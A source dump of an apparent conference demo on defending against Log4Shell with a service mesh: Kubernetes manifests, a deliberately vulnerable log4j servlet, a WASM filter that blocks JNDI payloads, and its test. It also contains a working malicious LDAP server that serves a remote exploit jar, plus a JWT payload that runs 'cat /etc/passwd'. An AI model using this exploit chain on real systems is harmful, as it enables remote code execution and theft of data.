| -------------------------------------------------------------------------------- /ngac/ngac-server.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: ngac-server 5 | labels: 6 | app: ngac-server 7 | spec: 8 | ports: 9 | - name: grpc-ngac 10 | port: 8080 11 | targetPort: 8080 12 | selector: 13 | app: ngac-server 14 | --- 15 | apiVersion: v1 16 | kind: ServiceAccount 17 | metadata: 18 | name: ngac-server 19 | labels: 20 | app: ngac-server 21 | --- 22 | apiVersion: apps/v1 23 | kind: Deployment 24 | metadata: 25 | name: ngac-server 26 | labels: 27 | app: ngac-server 28 | spec: 29 | replicas: 1 30 | selector: 31 | matchLabels: 32 | app: ngac-server 33 | template: 34 | metadata: 35 | labels: 36 | app: ngac-server 37 | spec: 38 | serviceAccountName: ngac-server 39 | containers: 40 | - name: ngac-server 41 | image: docker.io/nacx/ngac-server:nist-2022 42 | imagePullPolicy: Always 43 | ports: 44 | - containerPort: 8080 45 | livenessProbe: 46 | initialDelaySeconds: 10 47 | periodSeconds: 10 48 | tcpSocket: 49 | port: 8080 50 | readinessProbe: 51 | initialDelaySeconds: 10 52 | periodSeconds: 10 53 | httpGet: 54 | path: /health 55 | port: 8080 56 | volumeMounts: 57 | - mountPath: /etc/ngac/ 58 | name: graph 59 | env: 60 | - name: NGAC_ADDRESS 61 | value: :8080 62 | - name: NGAC_BACKEND 63 | value: file 64 | - name: NGAC_BACKEND_FILE_PATH 65 | value: /etc/ngac/graph.txt 66 | - name: NGAC_LOG_OUTPUT_LEVEL 67 | value: pdp:info 68 | volumes: 69 | - name: graph 70 | configMap: 71 | name: ngac-graph 72 | -------------------------------------------------------------------------------- /ngac/ngac-authz.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: ngac-authz 5 | labels: 6 | app: ngac-authz 7 | spec: 8 | ports: 9 | - name: grpc-ngac 10 | port: 8080 11 | targetPort: 8080 12 | selector: 13 | app: ngac-authz 14 | --- 15 | apiVersion: v1 16 | kind: ServiceAccount 17 | metadata: 18 | name: ngac-authz 19 | labels: 20 | app: ngac-authz 21 | --- 22 | apiVersion: apps/v1 23 | kind: Deployment 24 | metadata: 25 | name: ngac-authz 26 | labels: 27 | app: ngac-authz 28 | spec: 29 | replicas: 1 30 | selector: 31 | matchLabels: 32 | app: ngac-authz 33 | template: 34 | metadata: 35 | labels: 36 | app: ngac-authz 37 | spec: 38 | serviceAccountName: ngac-authz 39 | containers: 40 | - name: ngac-authz 41 | image: docker.io/nacx/ngac-agent:nist-2022 42 | imagePullPolicy: Always 43 | ports: 44 | - containerPort: 8080 45 | livenessProbe: 46 | initialDelaySeconds: 10 47 | periodSeconds: 10 48 | tcpSocket: 49 | port: 8080 50 | readinessProbe: 51 | initialDelaySeconds: 10 52 | periodSeconds: 10 53 | httpGet: 54 | path: /health 55 | port: 8080 56 | volumeMounts: 57 | - mountPath: /etc/ngac 58 | name: config 59 | env: 60 | - name: AGENT_ADDRESS 61 | value: :8080 62 | - name: AGENT_RESOLVER_CONFIG 63 | value: /etc/ngac/resolver.yaml 64 | - name: AGENT_LOG_OUTPUT_LEVEL 65 | value: pep:debug,pdp/audit:debug 66 | - name: AGENT_PDP_URI 67 | value: ngac-server:8080 68 | - name: AGENT_PDP_DISABLE_TLS 69 | value: "true" 70 | volumes: 71 | - name: config 72 | configMap: 73 | name: ngac-authz-config 74 | -------------------------------------------------------------------------------- /wasm-patch/main_test.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "testing" 5 | 6 | 
"github.com/stretchr/testify/require" 7 | 8 | "github.com/tetratelabs/proxy-wasm-go-sdk/proxywasm/proxytest" 9 | "github.com/tetratelabs/proxy-wasm-go-sdk/proxywasm/types" 10 | ) 11 | 12 | var ( 13 | // malicious JWT token for log4shell with the following claim: 14 | // "name": "${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}" 15 | // This contains a payload that will execute `cat /etc/passwd` on the vulnerable machine 16 | malicious = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE4MDA1NjMyNTQsImlhdCI6MTY0Mjc3NTI1NCwiaXNzIjoiZXZpbC5jbyIsIm5hbWUiOiIke2puZGk6bGRhcDovL2xvZzRzaGVsbDoxMzg5L2V4ZWMvWTJGMElDOWxkR012Y0dGemMzZGtDZz09fSIsInN1YiI6Im5hY3gifQ.I59rKl-z5QGKsbT3W9PCDidFrkPrL-iwZFakWy0L0JY" 17 | ) 18 | 19 | func TestHttpFilter_OnHttpRequestHeaders(t *testing.T) { 20 | opt := proxytest.NewEmulatorOption().WithVMContext(&vmContext{}) 21 | host, reset := proxytest.NewHostEmulator(opt) 22 | defer reset() 23 | 24 | // Call OnPluginStart -> the metric is initialized. 25 | status := host.StartPlugin() 26 | // Check the status returned by OnPluginStart is OK. 27 | require.Equal(t, types.OnPluginStartStatusOK, status) 28 | 29 | // Create http context. 30 | contextID := host.InitializeHttpContext() 31 | 32 | // Call OnHttpRequestHeaders no user 33 | action := host.CallOnRequestHeaders(contextID, [][2]string{}, false) 34 | require.Equal(t, types.ActionContinue, action) 35 | 36 | action = host.CallOnRequestHeaders(contextID, [][2]string{ 37 | {"Authorization", "Bearer " + malicious}, 38 | }, false) 39 | localResponse := host.GetSentLocalResponse(contextID) 40 | require.Equal(t, types.ActionPause, action) 41 | require.NotNil(t, localResponse) 42 | require.Equal(t, uint32(403), localResponse.StatusCode) 43 | 44 | host.CompleteHttpContext(contextID) 45 | 46 | // Check Envoy logs. 
47 | logs := host.GetInfoLogs() 48 | require.Contains(t, logs, "no authorization header found") 49 | require.Contains(t, logs, "access granted for: anonymous") 50 | require.Contains(t, logs, "access denied for: ${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}") 51 | } 52 | -------------------------------------------------------------------------------- /vulnerable-app/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4.0.0 3 | io.tetrate 4 | vulnerable 5 | 1.0-SNAPSHOT 6 | 7 | 8 | 1.8 9 | 1.8 10 | UTF-8 11 | 2.13.0 12 | 9.4.24.v20191120 13 | 14 | 15 | 16 | 17 | javax.servlet 18 | servlet-api 19 | 3.0-alpha-1 20 | provided 21 | 22 | 23 | org.eclipse.jetty 24 | jetty-server 25 | ${jetty.version} 26 | 27 | 28 | org.eclipse.jetty 29 | jetty-servlet 30 | ${jetty.version} 31 | 32 | 33 | org.apache.logging.log4j 34 | log4j-core 35 | ${log4j.version} 36 | 37 | 38 | com.nimbusds 39 | nimbus-jose-jwt 40 | 4.11.2 41 | 42 | 43 | 44 | 45 | 46 | 47 | maven-assembly-plugin 48 | 49 | 50 | 51 | io.tetrate.log4shell.vulnerable.App 52 | 53 | 54 | 55 | jar-with-dependencies 56 | 57 | 58 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /wasm-patch/local-envoy.yaml: -------------------------------------------------------------------------------- 1 | static_resources: 2 | listeners: 3 | - name: main 4 | address: 5 | socket_address: 6 | address: 0.0.0.0 7 | port_value: 8000 8 | filter_chains: 9 | - filters: 10 | - name: envoy.http_connection_manager 11 | typed_config: 12 | "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager 13 | stat_prefix: ingress_http 14 | codec_type: auto 15 | route_config: 16 | name: local_route 17 | virtual_hosts: 18 | - name: local_service 19 | domains: 20 | - "*" 21 | routes: 22 | - match: 23 | prefix: "/" 24 | route: 25 | cluster: vulnerable 26 | http_filters: 27 | - name: envoy.filters.http.wasm 28 | typed_config: 29 | "@type": type.googleapis.com/udpa.type.v1.TypedStruct 30 | type_url: type.googleapis.com/envoy.extensions.filters.http.wasm.v3.Wasm 31 | value: 32 | config: 33 | vm_config: 34 | runtime: "envoy.wasm.runtime.v8" 35 | code: 36 | local: 37 | filename: "/opt/log4shell/log4shell-patch.wasm" 38 | - name: envoy.filters.http.router 39 | typed_config: {} 40 | 41 | clusters: 42 | - name: vulnerable 43 | connect_timeout: 1s 44 | type: STRICT_DNS 45 | load_assignment: 46 | cluster_name: vulnerable 47 | endpoints: 48 | - lb_endpoints: 49 | - endpoint: 50 | address: 51 | socket_address: 52 | address: vulnerable 53 | port_value: 8080 54 | 55 | admin: 56 | access_log_path: "/dev/null" 57 | address: 58 | socket_address: 59 | address: 0.0.0.0 60 | port_value: 15000 61 | -------------------------------------------------------------------------------- /k8s/gke/external-dns.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ServiceAccount 3 | metadata: 4 | name: external-dns 5 | --- 6 | apiVersion: rbac.authorization.k8s.io/v1 7 | kind: ClusterRole 8 | metadata: 9 | name: external-dns 10 | rules: 11 | - apiGroups: [""] 12 | resources: ["services","endpoints","pods"] 13 | verbs: ["get","watch","list"] 14 | - apiGroups: ["extensions","networking.k8s.io"] 15 | resources: ["ingresses"] 16 | verbs: ["get","watch","list"] 17 | - apiGroups: [""] 18 | resources: ["nodes"] 19 | verbs: ["list"] 20 | - apiGroups: ["networking.istio.io"] 21 | resources: ["gateways", 
"virtualservices"] 22 | verbs: ["get","watch","list"] 23 | --- 24 | apiVersion: rbac.authorization.k8s.io/v1 25 | kind: ClusterRoleBinding 26 | metadata: 27 | name: external-dns-viewer 28 | roleRef: 29 | apiGroup: rbac.authorization.k8s.io 30 | kind: ClusterRole 31 | name: external-dns 32 | subjects: 33 | - kind: ServiceAccount 34 | name: external-dns 35 | namespace: cert-manager 36 | --- 37 | apiVersion: apps/v1 38 | kind: Deployment 39 | metadata: 40 | name: external-dns 41 | spec: 42 | selector: 43 | matchLabels: 44 | app: external-dns 45 | template: 46 | metadata: 47 | labels: 48 | app: external-dns 49 | spec: 50 | serviceAccountName: external-dns 51 | containers: 52 | - name: external-dns 53 | image: k8s.gcr.io/external-dns/external-dns:v0.10.2 54 | args: 55 | - --source=service 56 | - --source=ingress 57 | - --source=istio-gateway 58 | - --source=istio-virtualservice 59 | - --domain-filter=${DNS_ZONE} # will make ExternalDNS see only the hosted zones matching provided domain, omit to process all available hosted zones 60 | - --provider=google 61 | - --google-project=${PROJECT_ID} # Use this to specify a project different from the one external-dns is running inside 62 | - --policy=upsert-only # would prevent ExternalDNS from deleting any records, omit to enable full synchronization 63 | - --registry=txt 64 | - --txt-owner-id=external-dns-owner-id 65 | volumeMounts: 66 | - name: google-cloud-key 67 | mountPath: /var/secrets/google 68 | env: 69 | - name: GOOGLE_APPLICATION_CREDENTIALS 70 | value: /var/secrets/google/key.json 71 | volumes: 72 | - name: google-cloud-key 73 | secret: 74 | secretName: clouddns-dns01-solver-sa 75 | -------------------------------------------------------------------------------- /k8s/variables.example.env: -------------------------------------------------------------------------------- 1 | # Environment variables to be configured when deploying 2 | # the demo to Kubernetes 3 | 4 | ### Docker images ### 5 | 6 | # Docker registry where the application images will be deployed 7 | # Required: Always 8 | export HUB= 9 | 10 | # Istio 1.12 does not yet support imagePullSecrets in 11 | # WasmPlugins to pull images from private registries. 12 | # We need to push the WASM patch to a public Docker registry. 13 | # Required: Always 14 | export WASM_HUB=docker.io/nacx 15 | 16 | # Tag used when building all images 17 | # Required: Always 18 | export TAG=0.1 19 | 20 | 21 | ### Auth0 configuration ### 22 | 23 | # OIDC credentials 24 | # Required: Always 25 | export OIDC_CLIENT_ID= 26 | export OIDC_CLIENT_SECRET= 27 | 28 | # Auth0 application domain. 29 | # Go to your Application settings in Auth0 and set the 30 | # value of the 'Domain' field here (prefixed with https://). 31 | # Required: Always 32 | export AUTH0_URL="https://" 33 | 34 | 35 | ### Application configuration ### 36 | 37 | # Google Cloud project where the Kubernetes cluster is running 38 | # Required: In 'gke' mode 39 | export PROJECT_ID= 40 | 41 | # Custom domain name for your application: 42 | # - If you are using the 'local' mode, set it to "localhost" 43 | # - If you have a public DNS managed in Google Cloud DNS, set it 44 | # to the domain name where the application will be exposed. 45 | # This hostname will be configurad in the Istio ingress gateway. 46 | # For example: myapp.example.com 47 | # Note that this name doesn't need to exist in CloudDNS. I will 48 | # be automatically created by external-dns. 49 | # Required: Always 50 | export DOMAIN=localhost 51 | 52 | # Custom port for your application. 
53 | # - In 'local' mode set it to ':8443' (including the leading ':') 54 | # - In 'gke' mode, set it to an empty value. It is important that the 55 | # variable EXISTS with an empty value. 56 | # Required: Always 57 | export DOMAIN_PORT=:8443 58 | 59 | # If you are using the Cloud DNS deployment, configure here the name 60 | # of the DNS zone the application domain belongs to. The DNS zone must 61 | # exist in Cloud DNS. 62 | # For example: example.com 63 | # Required: In 'gke' mode 64 | export DNS_ZONE= 65 | 66 | # Email of your Google Cloud account 67 | # Required: In 'gke' mode 68 | export EMAIL=$(gcloud auth list --filter=status:ACTIVE --format="value(account)") 69 | 70 | # Fixture to make sure the Istio Ingress Gateway is properly configured 71 | # when using the 'local' mode. Do not remove. 72 | export INGRESS_HOST=$DOMAIN 73 | if [[ "$DOMAIN" == "localhost" ]]; then 74 | export INGRESS_HOST='*' 75 | fi 76 | -------------------------------------------------------------------------------- /k8s/manifests/istio-authservice.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: authservice 5 | labels: 6 | app: authservice 7 | spec: 8 | replicas: 1 9 | selector: 10 | matchLabels: 11 | app: authservice 12 | template: 13 | metadata: 14 | labels: 15 | app: authservice 16 | spec: 17 | volumes: 18 | - name: authservice-config 19 | configMap: 20 | name: authservice 21 | containers: 22 | - name: authservice 23 | image: ghcr.io/istio-ecosystem/authservice/authservice:0.5.0 24 | imagePullPolicy: IfNotPresent 25 | ports: 26 | - containerPort: 10003 27 | volumeMounts: 28 | - name: authservice-config 29 | mountPath: /etc/authservice 30 | readinessProbe: 31 | httpGet: 32 | path: /healthz 33 | port: 10004 34 | --- 35 | apiVersion: v1 36 | kind: Service 37 | metadata: 38 | name: authservice 39 | labels: 40 | app: authservice 41 | spec: 42 | ports: 43 | - port: 10003 44 | name: grpc 45 | selector: 46 | app: authservice 47 | --- 48 | kind: ConfigMap 49 | apiVersion: v1 50 | metadata: 51 | name: authservice 52 | data: 53 | # We listen on 0.0.0.0 since Istio 1.10, it changes the sidecar configuration only support 54 | # application listen on pod IP. See https://istio.io/latest/blog/2021/upcoming-networking-changes/ 55 | # for more details. 
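# The ${AUTH0_URL}, ${DOMAIN}, ${DOMAIN_PORT} and OIDC client placeholders below are expanded by envsubst at install time (see k8s/Makefile and k8s/variables.example.env).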
56 | config.json: | 57 | { 58 | "listen_address": "0.0.0.0", 59 | "listen_port": "10003", 60 | "log_level": "trace", 61 | "threads": 8, 62 | "chains": [ 63 | { 64 | "name": "idp_filter_chain", 65 | "filters": [ 66 | { 67 | "oidc": 68 | { 69 | "authorization_uri": "${AUTH0_URL}/authorize", 70 | "token_uri": "${AUTH0_URL}/oauth/token", 71 | "callback_uri": "https://${DOMAIN}${DOMAIN_PORT}/oauth/callback", 72 | "jwks_fetcher": { 73 | "jwks_uri": "${AUTH0_URL}/.well-known/jwks.json", 74 | "periodic_fetch_interval_sec": 60 75 | }, 76 | "client_id": "${OIDC_CLIENT_ID}", 77 | "client_secret": "${OIDC_CLIENT_SECRET}", 78 | "scopes": ["openid", "profile", "email"], 79 | "cookie_name_prefix": "authservice", 80 | "id_token": { 81 | "preamble": "Bearer", 82 | "header": "Authorization" 83 | }, 84 | "logout": { 85 | "path": "/logout", 86 | "redirect_uri": "${AUTH0_URL}/v2/logout?client_id=${OIDC_CLIENT_ID}&returnTo=https://${DOMAIN}${DOMAIN_PORT}" 87 | } 88 | } 89 | } 90 | ] 91 | } 92 | ] 93 | } 94 | -------------------------------------------------------------------------------- /vulnerable-app/src/main/java/io/tetrate/log4shell/vulnerable/GreetingsServlet.java: -------------------------------------------------------------------------------- 1 | package io.tetrate.log4shell.vulnerable; 2 | 3 | import java.io.IOException; 4 | 5 | import javax.servlet.ServletException; 6 | import javax.servlet.http.HttpServlet; 7 | import javax.servlet.http.HttpServletRequest; 8 | import javax.servlet.http.HttpServletResponse; 9 | 10 | import com.nimbusds.jose.JWSObject; 11 | 12 | import org.apache.logging.log4j.LogManager; 13 | import org.apache.logging.log4j.Logger; 14 | 15 | import net.minidev.json.JSONObject; 16 | 17 | public class GreetingsServlet extends HttpServlet { 18 | 19 | private static final long serialVersionUID = 1L; 20 | 21 | private static final String NAME_CLAIM = "name"; 22 | 23 | private static final String GROUP_CLAIM = "https://zta-demo/group"; 24 | 25 | private static Logger log = LogManager.getLogger(GreetingsServlet.class.getName()); 26 | 27 | @Override 28 | protected void doGet(HttpServletRequest request, HttpServletResponse response) 29 | throws ServletException, IOException { 30 | 31 | String user = "anonymous"; 32 | String group = null; 33 | JWSObject token = getToken(request); 34 | if (token != null) { 35 | JSONObject payload = token.getPayload().toJSONObject(); 36 | user = (String) payload.get(NAME_CLAIM); 37 | group = (String) payload.get(GROUP_CLAIM); 38 | 39 | // These log lines may trigger the log4shell attach vector if the JWT token contains 40 | // any malicious claim! 
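// log4j 2.13.0 (pinned in pom.xml) resolves ${jndi:...} lookups found in logged messages, so logging the raw claim value is what makes this request exploitable.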
41 | log.info("token payload: " + payload.toJSONString()); 42 | log.info("user resolved to: " + user); 43 | } 44 | 45 | response.setContentType("text/plain"); 46 | response.setStatus(HttpServletResponse.SC_OK); 47 | response.getWriter().println("Welcome, " + user + "!"); 48 | if (group != null) response.getWriter().println("Group: " + group); 49 | response.getWriter().println("Accessing: " + request.getRequestURI().substring(request.getContextPath().length())); 50 | if (token != null) response.getWriter().println("\n\nAuthenticated with token:\n" + token.serialize()); 51 | } 52 | 53 | private JWSObject getToken(HttpServletRequest req) { 54 | String auth = req.getHeader("Authorization"); 55 | if (auth == null) { 56 | auth = req.getHeader("authorization"); 57 | if (auth == null) { 58 | log.debug("no authorization header present"); 59 | return null; 60 | } 61 | } 62 | 63 | String[] parts = auth.split(" "); 64 | if (parts.length != 2) { 65 | log.debug("invalid authorization header value"); 66 | return null; 67 | } 68 | 69 | try { 70 | return JWSObject.parse(parts[1]); 71 | } catch (Exception ex) { 72 | ex.printStackTrace(); 73 | return null; 74 | } 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /log4shell-ldap/main.go: -------------------------------------------------------------------------------- 1 | // This file is based on https://github.com/jerrinot/log4shell-ldap 2 | 3 | package main 4 | 5 | import ( 6 | "embed" 7 | "flag" 8 | "fmt" 9 | "io/ioutil" 10 | "log" 11 | "net/http" 12 | "os" 13 | "os/signal" 14 | "strings" 15 | "syscall" 16 | 17 | "github.com/lor00x/goldap/message" 18 | ldap "github.com/vjeantet/ldapserver" 19 | ) 20 | 21 | //go:embed log4shell-exploit-1.0-SNAPSHOT.jar 22 | var jar embed.FS 23 | 24 | var publicHost string 25 | 26 | const ( 27 | exploitJar = "log4shell-exploit-1.0-SNAPSHOT.jar" 28 | javaClass = "io.tetrate.log4shell.exploit.Log4shellExploit" 29 | ) 30 | 31 | func main() { 32 | flag.StringVar(&publicHost, "publicIp", os.Getenv("publicIp"), "Usage:$ log4shell-ldap -publicIp 192.168.1.1") 33 | flag.Parse() 34 | 35 | ldapServer := startLdapServer() 36 | startHttpServer() 37 | 38 | fmt.Println("log4shell server started") 39 | 40 | ch := make(chan os.Signal, 2) 41 | signal.Notify(ch, syscall.SIGINT, syscall.SIGTERM) 42 | <-ch 43 | close(ch) 44 | ldapServer.Stop() 45 | } 46 | 47 | func startLdapServer() *ldap.Server { 48 | ldap.Logger = log.New(ioutil.Discard, "", log.LstdFlags) 49 | server := ldap.NewServer() 50 | routes := ldap.NewRouteMux() 51 | routes.Search(handleSearch) 52 | routes.Bind(handleBind) 53 | server.Handle(routes) 54 | go func() { 55 | err := server.ListenAndServe("0.0.0.0:1389") 56 | if err != nil { 57 | panic(err) 58 | } 59 | }() 60 | return server 61 | } 62 | 63 | func startHttpServer() { 64 | var staticFS = http.FS(jar) 65 | fs := http.FileServer(staticFS) 66 | http.Handle("/"+exploitJar, fs) 67 | go func() { 68 | err := http.ListenAndServe(":3000", nil) 69 | if err != nil { 70 | panic(err) 71 | } 72 | }() 73 | } 74 | 75 | func getOwnAddress(m *ldap.Message) string { 76 | if publicHost != "" { 77 | return publicHost 78 | } 79 | return strings.Split(m.Client.GetConn().LocalAddr().String(), ":")[0] 80 | } 81 | 82 | func handleSearch(w ldap.ResponseWriter, m *ldap.Message) { 83 | r := m.GetSearchRequest() 84 | select { 85 | case <-m.Done: 86 | return 87 | default: 88 | } 89 | 90 | fmt.Printf("received request from %s\n", m.Client.GetConn().RemoteAddr()) 91 | 92 | codebase := 
message.AttributeValue(fmt.Sprintf("http://%s:3000/%s", getOwnAddress(m), exploitJar)) 93 | e := ldap.NewSearchResultEntry("cn=pwned, " + string(r.BaseObject())) 94 | e.AddAttribute("cn", "pwned") 95 | e.AddAttribute("javaClassName", javaClass) 96 | e.AddAttribute("javaCodeBase", codebase) 97 | e.AddAttribute("objectclass", "javaNamingReference") 98 | e.AddAttribute("javaFactory", javaClass) 99 | 100 | fmt.Printf("delivering malicious LDAP payload: %v\n", e) 101 | 102 | w.Write(e) 103 | w.Write(ldap.NewSearchResultDoneResponse(ldap.LDAPResultSuccess)) 104 | } 105 | 106 | func handleBind(w ldap.ResponseWriter, m *ldap.Message) { 107 | w.Write(ldap.NewBindResponse(ldap.LDAPResultSuccess)) 108 | } 109 | -------------------------------------------------------------------------------- /wasm-patch/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "strings" 6 | 7 | "github.com/buger/jsonparser" 8 | "github.com/tetratelabs/proxy-wasm-go-sdk/proxywasm" 9 | "github.com/tetratelabs/proxy-wasm-go-sdk/proxywasm/types" 10 | ) 11 | 12 | func main() { 13 | proxywasm.SetVMContext(&vmContext{}) 14 | } 15 | 16 | type vmContext struct { 17 | // Embed the default VM context here, 18 | // so that we don't need to reimplement all the methods. 19 | types.DefaultVMContext 20 | } 21 | 22 | // Override types.DefaultVMContext. 23 | func (*vmContext) NewPluginContext(contextID uint32) types.PluginContext { 24 | return &pluginContext{} 25 | } 26 | 27 | type pluginContext struct { 28 | // Embed the default plugin context here, 29 | // so that we don't need to reimplement all the methods. 30 | types.DefaultPluginContext 31 | } 32 | 33 | // Override types.DefaultPluginContext. 34 | func (*pluginContext) NewHttpContext(contextID uint32) types.HttpContext { 35 | return &httpContext{contextID: contextID} 36 | } 37 | 38 | type httpContext struct { 39 | // Embed the default http context here, 40 | // so that we don't need to reimplement all the methods. 41 | types.DefaultHttpContext 42 | contextID uint32 43 | } 44 | 45 | // Override proxywasm.DefaultHttpContext 46 | func (*httpContext) OnHttpRequestHeaders(numHeaders int, endOfStream bool) types.Action { 47 | subject := getClaimValue("name") 48 | 49 | if strings.Contains(subject, "jndi") { 50 | proxywasm.LogInfof("access denied for: %s", subject) 51 | if err := proxywasm.SendHttpResponse(403, nil, []byte("Access Denied\n"), -1); err != nil { 52 | proxywasm.LogErrorf("failed to send local response: %v", err) 53 | proxywasm.ResumeHttpRequest() 54 | } 55 | return types.ActionPause 56 | } 57 | 58 | proxywasm.LogInfof("access granted for: %s", subject) 59 | 60 | return types.ActionContinue 61 | } 62 | 63 | // getClaimValue returns the value of the given claim. 64 | // This method assumes the claim has a string value. 
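// The JWT is not verified cryptographically: the bearer token is split on ".", its payload
// segment is base64url-decoded, and the claim is read with jsonparser. That is enough for
// this plugin's purpose of spotting ${jndi:...} payloads before they reach the vulnerable app.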
65 | func getClaimValue(claim string) string { 66 | headers, err := proxywasm.GetHttpRequestHeaders() 67 | if err != nil { 68 | proxywasm.LogCriticalf("failed to get request headers: %v", err) 69 | return "" 70 | } 71 | 72 | var auth string 73 | for _, h := range headers { 74 | if strings.ToLower(h[0]) == "authorization" { 75 | auth = h[1] 76 | break 77 | } 78 | } 79 | if auth == "" { 80 | proxywasm.LogInfof("no authorization header found") 81 | return "anonymous" 82 | } 83 | 84 | token := auth[strings.Index(auth, " ")+1:] 85 | parts := strings.Split(token, ".") 86 | if len(parts) != 3 { 87 | proxywasm.LogErrorf("invalid jwt token: %v", err) 88 | return "anonymous" 89 | } 90 | 91 | body, err := base64.RawURLEncoding.DecodeString(parts[1]) 92 | if err != nil { 93 | proxywasm.LogErrorf("invalid jwt token body: %v", err) 94 | return "anonymous" 95 | } 96 | 97 | res, err := jsonparser.GetString(body, claim) 98 | if err != nil { 99 | proxywasm.LogErrorf("invalid jwt token body: %v", err) 100 | return "anonymous" 101 | } 102 | 103 | return res 104 | } 105 | -------------------------------------------------------------------------------- /k8s/README.md: -------------------------------------------------------------------------------- 1 | # ZTA and DevSecOps for Cloud Native Applications demo setup 2 | 3 | The demo scenario is deployed on a GKE Kubernetes cluster and uses 4 | [Auth0](https://auth0.com/) as an OIDC Identity Provider. Follow these 5 | instructions to deploy the demo scenario on a Kubernetes cluster. 6 | 7 | ## Requirements 8 | 9 | The following tools are required to build the environment: 10 | 11 | * [istioctl 1.12](https://istio.io/latest/docs/setup/getting-started/#download) 12 | * gcloud 13 | * envsubst 14 | * openssl 15 | * kustomize 16 | 17 | ## Demo profiles 18 | 19 | The demo can be deployed in two different ways depending on the infrastructure that is available: 20 | 21 | | Profile | Description | 22 | |---------|------------| 23 | | local | Deploys everything on the GKE cluster and relies on Kubernetes port-forwarding to expose the Istio Ingress Gateway in `localhost`. | 24 | | gke | Uses `cert-manager` and `Google Cloud DNS` to configure the certificates and hostnames where the application will be exposed via the Istio Ingress Gateway. Requires a real DNS zone managed in the GKE project. | 25 | 26 | ## Auth0 application setup 27 | 28 | The demo uses [Auth0](https://auth0.com/) as an OIDC Identity Provider to enforce users are authenticated. 29 | Follow these instructions to configure an application for the demo: 30 | 31 | * In the Auth0 admin console, go to **Applications > Applications > Create Application**. 32 | * Select **Regular Web Applications**, give it a name, and **Create**. 33 | * Go to the **Settings** tab and configure the following, according to the profile you want to use (gke/local): 34 | * **Allowed Callback URLs:** 35 | * For the `local` profile: `https://localhost:8443/oauth/callback` 36 | * For the `gke` profile: `https:///oauth/callback` 37 | * **Allowed Logout URLs:** 38 | * For the `local` profile: `https://localhost:8443` 39 | * For the `gke` profile: `https://` 40 | * Scroll down to the **Advanced** section, and in the **OAuth** tag, make sure the 41 | **OIDC Conformant** option is enabled. 42 | * Go to **Users Management > Users > Create User**. Enter the requested data and **Create**. 
43 | 44 | ## Environment setup 45 | 46 | Once the Auth0 application has been created, configure the environment variables that 47 | will be used to customize the deployment process. Make a copy of the 48 | [variables.example.env](variables.example.env) file, name it `variables.env`, and modify 49 | it according to your needs. 50 | 51 | Once the file is there, you're ready to go! 52 | 53 | ## Deployment steps 54 | 55 | Before applying the Kubernetes manifests following the instructions below, build all the images: 56 | 57 | ```bash 58 | $ source variables.env 59 | $ make -C ../ clean docker-build docker-push 60 | ``` 61 | 62 | ### gke mode 63 | 64 | To deploy the demo in `gke` mode and leverage automatic certificate issuance and DNS 65 | configuration, run: 66 | 67 | ```bash 68 | $ make install/gke 69 | ``` 70 | 71 | If the deployment fails because of a `cert-manager` webhook issue, just run the command again. It takes 72 | quite some time until cert-manager is fully functional. 73 | Once the deployment completes you can open a browser to `https://` 74 | 75 | ### local mode 76 | 77 | To deploy the demo in `local` mode, install the application as follows and expose the 78 | Istio ingress gateway locally: 79 | 80 | ```bash 81 | $ make install/local 82 | $ kubectl -n istio-system port-forward svc/istio-ingressgateway 8443:443 83 | ``` 84 | 85 | Once the deployment completes you can open a browser to `https://localhost:8443` 86 | 87 | ## Environment cleanup 88 | 89 | To clean up the environment and uninstall everything from the cluster, you can use 90 | the following commands, according to the mode you used in the installation process: 91 | 92 | ```bash 93 | $ make uninstall/gke 94 | ``` 95 | 96 | or 97 | 98 | ```bash 99 | $ make uninstall/local 100 | ``` 101 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ZTA and DevSecOps for Cloud Native Applications 2 | 3 | This repository contains the materials for the *Service Mesh as the Security Kernel for Zero Trust Platforms* 4 | demo presented at the NIST ZTA conference 2022. 5 | 6 | ## Contents 7 | 8 | This demo contains three main applications: 9 | 10 | * [log4shell-ldap](log4shell-ldap): A malicious LDAP server that can be used to exploit the `Log4Shell` CVEs. 11 | * [vulnerable-app](vulnerable-app): An application that uses an old and insecure Java runtime and a vulnerable 12 | version of the `log4j` library. 13 | * [wasm-patch](wasm-patch): An [Envoy](https://www.envoyproxy.io/) [WASM extension](https://github.com/proxy-wasm/spec) written 14 | in Go using the [proxy-wasm-go-sdk](https://github.com/tetratelabs/proxy-wasm-go-sdk) that inspects requests and 15 | rejects those that contain `Log4Shell` payloads. 16 | 17 | See the [hacking](#hacking) section for details about how to customize them. 18 | 19 | ## Build requirements 20 | 21 | * [Go 1.17](https://go.dev/dl/) or higher. 22 | * [TinyGo](https://tinygo.org/) to compile and build the WASM plugin. 23 | * [Docker](https://www.docker.com/) to create the Docker containers. 24 | 25 | ## Hacking 26 | 27 | The behavior of the applications can be customized by modifying the [GreetingsServlet.java](vulnerable-app/src/main/java/io/tetrate/log4shell/vulnerable/GreetingsServlet.java) 28 | (vulnerable application) and the [Log4shellExploit.java](log4shell-ldap/exploit/src/main/java/io/tetrate/log4shell/exploit/Log4shellExploit.java) (exploit).
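If you customize the exploit, you will typically also want to craft your own lookup string. Here is a minimal sketch (not part of the repository) that builds a payload in the format described in the next paragraph, by base64-encoding an arbitrary shell command and embedding it in the `${jndi:...}` lookup:

```go
package main

import (
	"encoding/base64"
	"fmt"
)

// Builds a Log4Shell lookup string in the format the demo exploit expects:
// the command to execute is base64-encoded and appended to the /exec/ path
// served by the malicious LDAP server.
func main() {
	cmd := "cat /etc/passwd\n" // command the exploit will run on the victim
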